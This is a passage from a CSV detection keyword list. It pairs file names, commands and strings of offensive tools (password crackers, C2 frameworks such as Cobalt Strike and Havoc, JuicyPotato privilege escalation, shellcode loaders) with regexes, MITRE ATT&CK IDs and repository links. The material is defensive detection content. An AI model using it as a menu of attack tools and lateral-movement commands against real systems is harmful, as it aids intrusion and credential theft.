T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john/password.lst*",".{0,1000}john\/password\.lst.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*john/run/fuzz.dic*",".{0,1000}john\/run\/fuzz\.dic.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john/src/ztex/*",".{0,1000}john\/src\/ztex\/.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john@moozle.wtf*",".{0,1000}john\@moozle\.wtf.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*john_crack_asrep*",".{0,1000}john_crack_asrep.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*john_crack_kerberoast*",".{0,1000}john_crack_kerberoast.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*john_log_format*",".{0,1000}john_log_format.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john_mpi.c*",".{0,1000}john_mpi\.c.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john_register_all*",".{0,1000}john_register_all.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*JohnTheRipper *",".{0,1000}JohnTheRipper\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" 
"*JohnTheRipper/*",".{0,1000}JohnTheRipper\/.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*JohnWoodman/stealthInjector*",".{0,1000}JohnWoodman\/stealthInjector.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*Jomungand\vstudio-project*",".{0,1000}Jomungand\\vstudio\-project.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*Jomungand-main*",".{0,1000}Jomungand\-main.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*joomscan -u *",".{0,1000}joomscan\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*joomscan*",".{0,1000}joomscan.{0,1000}","offensive_tool_keyword","joomscan","Joomla Vulnerability Scanner.","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/rezasp/joomscan","1","0","N/A","N/A","10","1016","242","2024-04-21T13:09:15Z","2016-09-01T09:06:17Z" "*Jormungand.exe*",".{0,1000}Jormungand\.exe.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*Jormungand.vcxproj*",".{0,1000}Jormungand\.vcxproj.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*Jormungandr.cpp*",".{0,1000}Jormungandr\.cpp.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*Jormungandr.exe*",".{0,1000}Jormungandr\.exe.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*Jormungandr-master*",".{0,1000}Jormungandr\-master.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a 
kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*journalctl -u isc-dhcp-server.service | tail -n 50*",".{0,1000}journalctl\s\-u\sisc\-dhcp\-server\.service\s\|\stail\s\-n\s50.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*JPCERTCC*",".{0,1000}JPCERTCC.{0,1000}","offensive_tool_keyword","Github Username","github repo name containing multiple tools for log exploitation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/JPCERTCC","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*JPG0mez/ADCSync*",".{0,1000}JPG0mez\/ADCSync.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","1","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*jpillora/chisel*",".{0,1000}jpillora\/chisel.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*jquery-c2.*.profile*",".{0,1000}jquery\-c2\..{0,1000}\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*js-cracker-client/cracker.js*",".{0,1000}js\-cracker\-client\/cracker\.js.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*JScriptStager*",".{0,1000}JScriptStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*jtee43gt-6543-2iur-9422-83r5w27hgzaq*",".{0,1000}jtee43gt\-6543\-2iur\-9422\-83r5w27hgzaq.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*juicycreds_dump*",".{0,1000}juicycreds_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*JuicyPotato.exe*",".{0,1000}JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*JuicyPotato.exe*",".{0,1000}JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - 
T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*JuicyPotato.sln*",".{0,1000}JuicyPotato\.sln.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*JuicyPotato.vcxproj*",".{0,1000}JuicyPotato\.vcxproj.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*juicypotato.x64.dll*",".{0,1000}juicypotato\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*juicypotato.x86.dll*",".{0,1000}juicypotato\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*juicypotato_reflective.dll*",".{0,1000}juicypotato_reflective\.dll.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*JuicyPotatoNG.cpp*",".{0,1000}JuicyPotatoNG\.cpp.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*JuicyPotatoNG.exe*",".{0,1000}JuicyPotatoNG\.exe.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" 
"*JuicyPotatoNG.sln*",".{0,1000}JuicyPotatoNG\.sln.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*JuicyPotatoNG.txt*",".{0,1000}JuicyPotatoNG\.txt.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*JuicyPotatoNG.zip*",".{0,1000}JuicyPotatoNG\.zip.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*JuicyPotatoNG-main*",".{0,1000}JuicyPotatoNG\-main.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*jump psexec_psh*",".{0,1000}jump\spsexec_psh.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 
- T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*jump psexec64*",".{0,1000}jump\spsexec64.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*jump winrm *",".{0,1000}jump\swinrm\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*jump winrm*",".{0,1000}jump\swinrm.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*jump-exec psexec *",".{0,1000}jump\-exec\spsexec\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*jump-exec scshell*",".{0,1000}jump\-exec\sscshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*JumpSession_BOF-main*",".{0,1000}JumpSession_BOF\-main.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","9","1","77","12","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z" "*JunctionFolder.exe*",".{0,1000}JunctionFolder\.exe.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
